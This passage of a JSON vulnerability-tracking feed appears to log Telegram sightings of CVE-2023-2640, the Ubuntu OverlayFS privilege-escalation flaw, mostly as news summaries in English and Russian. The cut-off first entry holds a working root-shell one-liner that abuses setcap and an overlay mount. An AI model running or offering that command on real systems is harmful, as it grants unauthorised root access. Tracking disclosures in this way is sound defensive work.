l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*; python3 -c 'import os;os.setuid(0);os.system(\\\"/bin/bash\\\")'\"\n\n#ubuntu #lpe", "creation_timestamp": "2023-11-10T10:45:01.000000Z"}, {"uuid": "0d6cb8a3-4332-455e-940b-a528e9b34c03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "Telegram/WBpQ-by4K8KKZ8enRzCN1LJDgV2NUIqq9NMQsH6pg28xUHU", "content": "", "creation_timestamp": "2023-10-13T02:31:45.000000Z"}, {"uuid": "03c7c751-7d4d-4b02-875b-6970da11fde2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "https://t.me/cibsecurity/67283", "content": "\u203c CVE-2023-2640 \u203c\n\nOn Ubuntu kernels carrying both c914c0e27eb0 and \"UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs\", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-07-26T07:27:21.000000Z"}, {"uuid": "4e0c8352-0937-4740-bb44-3a9970792e9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "https://t.me/true_secator/4667", "content": "\u0412 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438.\n\n\u041a\u0430\u043a \u0432\u044b \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e \u0434\u043e\u0433\u0430\u0434\u0430\u043b\u0438\u0441\u044c, \u0440\u0435\u0447\u044c \u0438\u0434\u0435\u0442 \u043e\u0431 Ubuntu, \u0433\u0434\u0435 \u0443\u0433\u0440\u043e\u0437\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 40% \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043a\u043e\u0438\u0445 \u043d\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u043a\u043e\u043b\u043e 40 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432.\n\nCVE-2023-32629 \u0438 CVE-2023-2640 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043d\u0435\u0431\u0435\u0437\u044b\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 \u0438\u0437 Wiz, \u0437\u0430 \u043f\u043b\u0435\u0447\u0430\u043c\u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0430\u0433\u043e\u043d \u0438 \u043c\u0430\u043b\u0435\u043d\u044c\u043a\u0430\u044f \u0442\u0435\u043b\u0435\u0436\u043a\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \n\n\u041f\u0435\u0440\u0432\u044b\u0439 \u0431\u0430\u0433 \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 \u044f\u0434\u0440\u0435 Ubuntu \u0441\u0432\u044f\u0437\u0430\u043d \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u043e\u0439 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0439, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438.\n\n\u0412\u0442\u043e\u0440\u043e\u0439 - \u0441\u0440\u0435\u0434\u043d\u0435\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438, \u0441\u0432\u044f\u0437\u0430\u043d \u0441 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u043c\u044f\u0442\u044c\u044e \u0432 \u044f\u0434\u0440\u0435 Linux, \u0433\u0434\u0435 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u043f\u0440\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0435 \u043a VMA \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0435\u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0439 \u0432 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043c\u043e\u0434\u0443\u043b\u044f OverlayFS \u0432 \u044f\u0434\u0440\u0435 Linux.\n\nOverlayFS \u2014 \u044d\u0442\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u043d\u044b\u043c \u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0434\u0430\u0432\u043d\u043e \u043f\u043e\u0442\u0438\u0440\u0430\u044e\u0442 \u0440\u0443\u043a\u0438 \u0438\u0437-\u0437\u0430 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043b\u0435\u0433\u043a\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u043e\u0448\u0438\u0431\u043e\u043a.\n\nUbuntu \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0439 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043f\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u043c \u0438 \u0435\u0449\u0435 \u0448\u0435\u0441\u0442\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u044f\u0434\u0440\u0430, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f.\n\n\u0422\u043e\u0442 \u043d\u0435 \u043b\u043e\u0432\u043a\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442, \u043a\u043e\u0433\u0434\u0430 \u043f\u043e\u0441\u043b\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430.", "creation_timestamp": "2023-07-28T10:40:05.000000Z"}, {"uuid": "272ad3e2-4eb3-49bf-bb60-1121e573659b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "Telegram/XokNk1n2AlXvZDyddO7dWwUftfCjHL5RkbanjoRiKPdBCdM", "content": "", "creation_timestamp": "2023-08-15T12:51:17.000000Z"}, {"uuid": "66379756-2f3a-4c62-857a-54f48e0aa99f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "exploited", "source": "https://t.me/true_secator/6124", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u041b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0443 \u043f\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0437\u0430 \u0432\u0442\u043e\u0440\u043e\u0439 \u043a\u0432\u0430\u0440\u0442\u0430\u043b 2024 \u0433\u043e\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u043d\u0430\u0441\u044b\u0449\u0435\u043d\u043d\u044b\u043c \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f \u043d\u043e\u0432\u044b\u0445 \u043e\u0448\u0438\u0431\u043e\u043a \u0438 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n\n\u0412 \u043d\u043e\u0432\u043e\u043c \u043e\u0442\u0447\u0435\u0442\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0439 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0441\u0440\u0435\u0437\u044b \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c.\n\n\u041e\u0431\u0449\u0435\u0435 \u0447\u0438\u0441\u043b\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u0440\u0435\u0432\u044b\u0441\u0438\u043b\u043e \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0437\u0430 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0439 \u043f\u0435\u0440\u0438\u043e\u0434 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0433\u043e \u0433\u043e\u0434\u0430, \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044f \u0434\u0438\u043d\u0430\u043c\u0438\u043a\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430.\n\n\u0414\u043e\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441 PoC \u0438 \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0438\u0445\u0441\u044f \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043d\u0435\u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043d\u0438\u0437\u0438\u043b\u0430\u0441\u044c \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e 2023 \u0433\u043e\u0434\u0430. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u043e \u0442\u0438\u043f\u0443 \u043f\u043e\u0434\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043e\u0442\u0441\u0442\u043e\u044f\u0442\u0441\u044f \u043a \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c.\n\n\u0422\u0430\u043a\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438, \u0442\u0430\u043a \u043a\u0430\u043a \u043a \u0447\u0438\u0441\u043b\u0443 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u041f\u041e \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a \u0447\u0443\u0432\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c: \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043e\u0431\u043c\u0435\u043d\u0430 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u0447\u0435\u0440\u0435\u0437 VPN, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u043c\u0438 \u0438 IoT-\u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u0430\u043d\u043d\u044b\u0445 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u041b\u041a, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0434\u043b\u044f Windows \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0440\u0430\u0441\u0442\u0438 \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0437\u0430 \u0441\u0447\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0440\u0430\u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043f\u0443\u0442\u0435\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\u041a \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u043e\u0442\u043d\u043e\u0441\u044f\u0442\u0441\u044f \u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Microsoft Office (CVE-2018-0802, CVE-2017-11882\u00a0, CVE-2017-0199\u00a0 \u0438 CVE-2021-40444\u00a0).\n\n\u041d\u0430\u0431\u0438\u0440\u0430\u044e\u0449\u0430\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u044c \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u043c \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0435 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 Linux \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0440\u043e\u0441\u0442, \u043e\u0434\u043d\u0430\u043a\u043e \u0432 \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u0432\u0435\u0441 Windows \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u044f\u0434\u0440\u043e (CVE-2022-0847, CVE-2023-2640 \u0438 CVE-2021-4034), \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044f EoP.\n\n\u0422\u043e\u043f-10 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0432 APT-\u0430\u0442\u0430\u043a\u0430\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0441\u044f \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u00a0\u043f\u0435\u0440\u0432\u043e\u0433\u043e \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430, \u043d\u043e \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0432\u043e \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0435 \u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e-\u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u044b\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0442\u0435\u0445 \u0436\u0435 \u0442\u0438\u043f\u043e\u0432: \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0440\u0430\u0437\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u043e\u0444\u0438\u0441\u043d\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f.\n\n\u0411\u043e\u043b\u044c\u0448\u043e\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Bring You Own Vulnerable Driver (BYOVD). \u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043e\u043b\u0436\u043d\u0430 \u0431\u044b\u0442\u044c \u0441\u0432\u0435\u0436\u0435\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u0430\u043c\u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u043d\u0435\u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0435 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443.\n\n2023 \u0433\u043e\u0434 \u0441\u0442\u0430\u043b \u0441\u0430\u043c\u044b\u043c \u0431\u043e\u0433\u0430\u0442\u044b\u043c \u043d\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c BYOVD. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0437\u0430 \u043f\u0435\u0440\u0432\u0443\u044e \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0443 2024-\u0433\u043e \u0438\u0445 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0431\u043e\u043b\u044c\u0448\u0435, \u0447\u0435\u043c \u0437\u0430 2021 \u0438 2022 \u0433\u043e\u0434\u044b, \u0432\u043c\u0435\u0441\u0442\u0435 \u0432\u0437\u044f\u0442\u044b\u0435. \u0412\u0442\u043e\u0440\u043e\u0439 \u043a\u0432\u0430\u0440\u0442\u0430\u043b \u0442\u0430\u043a\u0436\u0435 \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0441\u044f \u0440\u043e\u0441\u0442\u043e\u043c \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044f.\n\n\u041d\u0430\u0433\u043b\u044f\u0434\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0433\u0440\u0430\u0444\u0438\u043a\u0430 \u0438 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432\u043e \u0432\u0442\u043e\u0440\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2024 \u0433\u043e\u0434\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2024-08-22T19:40:05.000000Z"}, {"uuid": "abfff822-2051-4106-8288-5b69c5ae8241", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "https://t.me/thehackernews/3659", "content": "\ud83d\udea8 Heads up, Ubuntu users! \n \nResearchers have discovered high-severity Linux flaws in the Ubuntu kernel, affecting 40% of users! \n \nLearn about GameOver(lay) vulnerabilities CVE-2023-32629 and CVE-2023-2640: https://thehackernews.com/2023/07/gameoverlay-two-severe-linux.html", 